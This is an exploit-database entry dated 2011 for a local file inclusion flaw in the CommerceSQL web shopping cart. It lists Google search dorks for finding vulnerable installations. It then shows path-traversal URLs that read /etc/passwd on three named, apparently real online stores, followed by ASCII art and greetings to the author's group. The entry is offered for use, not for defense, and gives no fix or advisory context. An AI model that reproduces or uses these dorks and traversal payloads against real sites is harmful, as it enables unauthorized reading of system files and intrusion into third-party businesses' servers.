CommerceSQL LFI Vulnerability

2011-05-08T00:00:00
ID 1337DAY-ID-16070
Type zdt
Reporter xConsoLe`
Modified 2011-05-08T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: CommerceSQL LFI Vulnerability .
# Author: xConsoLe`
# Home: http://dztools.net
# Vendor or Software Link: http://www.commercesql.com/
# Category:: Local File Include
# d0rk: intext:Couldn't exec sth! at ./admin/html_lib.pl line
# d0rk: inurl:cgi-bin/commercesql
# Tested on: Windows XP SP3

  (  )   /\   _                 (
    \ |  (  \ ( \.(               )                      _____
  \  \ \  `  `   ) \             (  ___                 / _   \
 (_`    \+   . x  ( .\            \/   \____-----------/ (o)   \_
- .-               \+  ;          (  O                           \____
    xConsoLe Powa         )        \_____________  `              \  /
(__                +- .( -'.- <. - _  VVVVVVV VV V\                 \/
(_____            ._._: <_ - <- _  (--  _AAAAAAA__A_/                |
  .    /./.+-  . .- /  +--  - .     \______________//_              \_______
  (__ ' /x  / x _/ (                                  \___'          \     /
 , x / ( '  . / .  /                                      |           \   /
    /  /  _/ /    +                                      /              \/
   '  (__/                                             /                  \
   
   
   > Demo:
   
   eg: http://birdstheword.com/cgi-bin/eStore/index.cgi?cart_id=2263.81894&pid=396
   
   >> http://birdstheword.com/cgi-bin/eStore/index.cgi?page=../../../../../../../etc/passwd
   
   
   eg: http://www.garagedoorcheck.com/cgi-bin/CommerceSQL/index.cgi?page=95
   
   >> http://www.garagedoorcheck.com/cgi-bin/CommerceSQL/index.cgi?page=../../../../../../../etc/passwd
   
   
   eg: http://brewercoinc.com/cgi-bin/eStore/index.cgi?did=2&plid=&pid=27&product=
   
   >> http://brewercoinc.com/cgi-bin/eStore/index.cgi?page=../../../../../../../etc/passwd
   

   
   Greetz: My Girl <3 ; Uknownv1rus ; Dfpirate ; J|nX ; Massyusse ; Death.Sev ; XeN` ; FiiskeR ; Manson .
   Made in Algeria .
   Shab El Bac 2011 nchallah : Ma , Am , Li , Sa , Sa , Ha , Mehdi K , Rafa , Bou3am , 
                               MahM0ud , Death.Sev & All Djma3et Elkhire :D .
							   
				PEACE ^^ .



#  0day.today [2018-01-02]  #